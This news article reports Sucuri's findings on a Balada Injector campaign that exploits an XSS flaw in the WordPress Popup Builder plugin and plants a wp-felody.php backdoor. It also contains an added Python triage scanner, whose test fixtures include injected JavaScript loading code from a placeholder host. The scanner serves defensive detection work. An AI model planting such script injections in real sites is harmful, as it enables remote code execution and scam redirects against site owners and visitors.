Sucuri Unveils Balada Injector Campaign Targeting WordPress

Security specialists at Sucuri have discovered a new Balada Injector campaign that began in mid-December 2023. It has so far infected over 6700 WordPress sites running a vulnerable version of the Popup Builder plugin.

Balada Injector was first identified and named by Sucuri last year. It has been spreading Linux backdoors since 2017 and has affected over a million WordPress sites through vulnerabilities in numerous plugins and themes.

Typically, Balada Injector redirects visitors of compromised sites to fake technical support pages, fraudulent lottery wins, scam-related push notifications, and more.

The latest campaign began on December 13, 2023, shortly after WPScan analysts disclosed CVE-2023-6000, an XSS vulnerability in the Popup Builder plugin. The plugin is used on 200,000 sites.

The Balada Injector operators quickly added an exploit for this bug to their malware. It abuses the Popup Builder sgpbWillOpen event so that malicious JavaScript stored in the site’s database runs whenever a popup is opened.

To deepen the infection, the attackers also modify the wp-blog-header.php file, injecting the same JavaScript backdoor into the site.

Next, the attackers check for administrator cookies; this lets them upload sets of scripts that install the main backdoor, disguised as a plugin file named wp-felody.php.
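The three infection traces described above (the database-stored JavaScript hooked to sgpbWillOpen, the modified wp-blog-header.php, and the wp-felody.php backdoor file) lend themselves to a simple defender-side triage check. The script below is an added example, not Sucuri's tooling; the regexes, the abridged stock header, the placeholder.invalid URLs and the sample database export are all assumptions constructed for illustration.

```python
"""Added triage check for the Balada indicators named above: wp-felody.php,
a tampered wp-blog-header.php, and sgpbWillOpen hooks in stored popup JS."""
import re
import tempfile
from pathlib import Path

BACKDOOR_NAME = "wp-felody.php"      # disguised backdoor file (from the article)
HEADER_FILE = "wp-blog-header.php"   # core file the campaign modifies (from the article)
# Stock wp-blog-header.php only loads wp-load.php, calls wp() and includes the
# template loader, so script tags or encoded-PHP helpers are foreign (assumed check).
HEADER_RE = re.compile(r"<script|eval\s*\(|base64_decode\s*\(", re.I)
# Stored Popup Builder JS that hooks sgpbWillOpen and then appends a script
# element is how a database-resident payload fires on popup open (assumed check).
POPUP_RE = re.compile(r"sgpbWillOpen[\s\S]{0,300}?createElement\(\s*['\"]script", re.I)

def scan_site(root: Path) -> list[tuple[str, str]]:
    """Return (indicator, relative path) pairs; .sql files are read as DB exports."""
    findings = []
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        rel, text = str(path.relative_to(root)), path.read_text(errors="ignore")
        if path.name == BACKDOOR_NAME:
            findings.append(("backdoor-file", rel))
        if path.name == HEADER_FILE and HEADER_RE.search(text):
            findings.append(("modified-core-header", rel))
        if path.suffix == ".sql" and POPUP_RE.search(text):
            findings.append(("popup-js-hook", rel))
    return findings

# Constructed stand-in for the stock core file (abridged, comments removed).
STOCK_HEADER = ("<?php\nif ( ! isset( $wp_did_header ) ) {\n\t$wp_did_header = true;\n"
                "\trequire_once __DIR__ . '/wp-load.php';\n\twp();\n"
                "\trequire_once ABSPATH . WPINC . '/template-loader.php';\n}\n")

def build_sample_site(infected: bool) -> Path:
    """Construct a throwaway WordPress-like tree; the infected variant carries
    placeholder versions of the three indicators (placeholder.invalid, no real URLs)."""
    root = Path(tempfile.mkdtemp())
    header = STOCK_HEADER
    dump = "INSERT INTO wp_postmeta VALUES (1, 'sg_popup_options', 'a:0:{}');\n"
    if infected:
        header += '?><script src="https://placeholder.invalid/x.js"></script>\n'
        plugins = root / "wp-content" / "plugins"
        plugins.mkdir(parents=True)
        (plugins / BACKDOOR_NAME).write_text("<?php // placeholder backdoor body\n")
        dump += ("INSERT INTO wp_postmeta VALUES (2, 'custom_js', 'jQuery(window).on("
                 "\"sgpbWillOpen\", function(){var s=document.createElement(\"script\");"
                 "s.src=\"https://placeholder.invalid/p.js\";document.head.appendChild(s);});');\n")
    (root / HEADER_FILE).write_text(header)
    (root / "db-export.sql").write_text(dump)
    return root
```

Run scan_site against a real document root together with a SQL export of the site database; any hit is a lead for manual review rather than proof of compromise, since custom popup JS can legitimately use the sgpbWillOpen event.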

The backdoor can execute arbitrary PHP code, upload and run files, communicate with the attackers, and fetch additional payloads.

As noted above, over 6700 sites are currently infected; the redirects in this campaign lead mostly to fraudulent push-notification pages.